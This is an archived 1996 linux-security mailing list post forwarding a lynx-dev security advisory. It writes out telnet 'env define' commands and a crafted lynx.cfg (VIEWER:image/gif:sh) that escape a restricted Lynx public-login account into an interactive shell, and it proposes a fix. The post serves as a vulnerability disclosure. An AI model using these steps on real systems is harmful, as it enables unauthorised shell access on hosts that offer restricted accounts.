[1103] in linux-security and linux-alert archive

home help back first fref pref prev next nref lref last post

[linux-security] LYNX-DEV security problem with environment for lynx -restrictions=all (fwd)

daemon@ATHENA.MIT.EDU (Roscinante)
Tue Aug 27 22:06:39 1996

Date: Mon, 26 Aug 1996 09:36:14 -0400 (EDT)
From: Roscinante <rosc@fbn.globalent.net>
To: Linux-security <linux-security@tarsier.cv.nrao.edu>


  This came in today on the lynx-dev list, thought it would be of interest to
linux security (not sure what OS this fellow is using, I sent a reply, and
told him about the 'fixed' telnet)

---------- Forwarded message ----------
Date: Sun, 25 Aug 1996 23:21:03 EDT
From: mhpower@MIT.EDU
Reply-To: lynx-dev@sig.net
To: lynx-dev@sig.net
Subject: LYNX-DEV security problem with environment for lynx -restrictions=all

In using Lynx 2.5FM (22 August version) from a public-login account
whose shell runs "lynx -restrictions=all", I've found it's possible to
defeat some restrictions and obtain interactive access to /bin/sh by
passing the environment variables WWW_HOME and LYNX_CFG via telnetd.

The attack will work on more system types if it's possible to write to
some filesystem that's mounted by the target machine. For example,

   % telnet
   telnet> env define WWW_HOME http://anyserver/anything.gif
   telnet> env define LYNX_CFG /afs/some.cell/users/myname/lynx.cfg
   telnet> open public-lynx-host -l lynx

where /afs/some.cell/users/myname/lynx.cfg contains

   SUFFIX:.gif:image/gif
   VIEWER:image/gif:sh

This gives me an sh shell on public-lynx-host with the uid of "lynx".

On some system types, it may instead be possible to do

   telnet> env define LYNX_CFG /dev/stdin

and type in the desired contents (e.g., the SUFFIX and VIEWER lines).

I'd suggest adding support for "-restrictions=env" which would prevent
lynx from modifying its behavior based on any call to getenv. Of
course, a public-login account might be better configured to
explicitly set WWW_HOME and LYNX_CFG (or use "-cfg=") before starting
lynx, but I think the risk of setup mistakes would be reduced if
ignoring the environment were supported within the lynx source code.

Matt


~~
 All that is gold does not glitter..                      .
 Not all those who wander are lost..J.R.R.T.        .     /\     .
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~    ._____//  \\_____.
And the knowledge that they fear                 . \\    Rush    // .
is a weapon to be held against them.. N.P.       .   \\  2112  //   .
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~    .  //   /\   \\  .
Ghost in the Machine (wraith@styx.ios.com)        I[[[[[[[[]]]]]]]]I
Roscinante (rosc@fbn.globalent.net)
http://www.globalent.net/users/fbn

home help back first fref pref prev next nref lref last post